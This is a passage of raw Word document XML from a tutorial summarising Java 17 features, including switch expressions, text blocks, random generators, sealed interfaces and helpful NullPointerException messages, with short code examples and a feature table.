          <v:rect id="_x0000_i1789" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836C394" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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3. Switch Expressions (Preview earlier, now stable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9E1AC"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Allows switch to return values and have more concise syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9A7EA" w14:textId="77777777" w:rsidR="006E7DA3" w:rsidRPr="00CE4B95" w:rsidRDefault="006E7D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227639"/>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resul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witch</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0DBC8F2" w14:textId="77777777" w:rsidR="006E7DA3" w:rsidRPr="00CE4B95" w:rsidRDefault="006E7D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2276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ase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MONDAY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Start of week"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8DF61" w14:textId="77777777" w:rsidR="006E7DA3" w:rsidRPr="00CE4B95" w:rsidRDefault="006E7D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2276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ase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FRIDAY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eekend is near"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E62A1" w14:textId="77777777" w:rsidR="006E7DA3" w:rsidRPr="00CE4B95" w:rsidRDefault="006E7D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2276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defaul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Midweek"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36946F9B" w14:textId="592C10A0" w:rsidR="006E7DA3" w:rsidRPr="00CE4B95" w:rsidRDefault="006E7D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227639"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB19C5" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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More readable and expressive control flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30787AC7" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="53F5F1C2">
          <v:rect id="_x0000_i1790" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="190AE077" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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4. Text Blocks (Introduced in Java 15, refined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151E33C"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Multi-line string literals with better formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE2BBB" w14:textId="77777777" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>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jso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p>
    <w:p w14:paraId="29105BC8" w14:textId="77777777" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739DDFFF" w14:textId="77777777" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ChatGPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA73067" w14:textId="77777777" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF88F26" w14:textId="77777777" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D4524" w14:textId="673AA9DB" w:rsidR="00871611" w:rsidRPr="00CE4B95" w:rsidRDefault="008716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898374"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              """</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E6E8E" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Useful for JSON, SQL, XML, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E940225" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1D488A67">
          <v:rect id="_x0000_i1791" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2326FF" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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5. New Pseudo-Random Number Generators (JEP 356)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BF182"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Provides new interfaces and implementations for random number generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427289B" w14:textId="77777777" w:rsidR="008302E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00830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999455"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RandomGenerator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ran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andomGeneratorFactory</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f</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L64X256MixRando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reate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394BE2DC" w14:textId="2A497C01" w:rsidR="008302E5" w:rsidRPr="00CE4B95" w:rsidRDefault="00830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999455"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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an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extInt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C109D6D" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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More flexible and efficient random generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64743630" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="02F24C9E">
          <v:rect id="_x0000_i1792" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FB63D" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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6. Foreign Function &amp; Memory API (Incubator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620F2417"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Allows Java programs to call native code and allocate memory outside the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E86FB4" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Improves native interop without JNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65123510" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2471E98B">
          <v:rect id="_x0000_i1793" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A9D94" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Enhanced NullPointerException Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECBE66C"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Helpful exception messages with more context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F4478"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 xml:space="preserve">Exception in thread "main" java.lang.NullPointerException: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C29580"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 xml:space="preserve">  Cannot invoke "String.length()" because "str" is null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE1B2D" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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Great for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649578B8" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="4119506A">
          <v:rect id="_x0000_i1794" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55450FD9" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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8. Removal/Deprecation of Legacy Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557DCBFA"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Applet API deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56070EFC"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Experimental AOT and JIT compilers removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6B93A"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RMI Activation removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CE48D" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="032ED7F7">
          <v:rect id="_x0000_i1795" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28C014" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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9. JEP 409: Sealed Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D845A"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Interfaces can also be sealed like classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00510D" w14:textId="04E67276" w:rsidR="00527B24" w:rsidRPr="00CE4B95" w:rsidRDefault="00527B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7315839"/>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eale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erfac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nimal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> permits </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Do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a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0B2F2188" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008B0EE9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="371FCFF6">
          <v:rect id="_x0000_i1796" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2621EB" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">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01"/>
        <w:gridCol w:w="3410"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="7DF53067" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F0011A" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7966F5EB" w14:textId="77777777" w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w:rsidRDefault="007C20D6" w:rsidP="008B0EE9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="5A64BC05" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424EDF52"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Sealed Classes &amp; Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66DA2906"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Restricts subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="6EB38AF2" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658DFAC9"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Pattern Matching for instanceof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12DACB3C"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Cleaner type checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C20D6" w:rsidRPr="00CE4B95" w14:paraId="173C64F9" w14:textId="77777777" w:rsidTr="007C20D6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E6510F"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Switch Expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C0A310"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Return values directly from switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
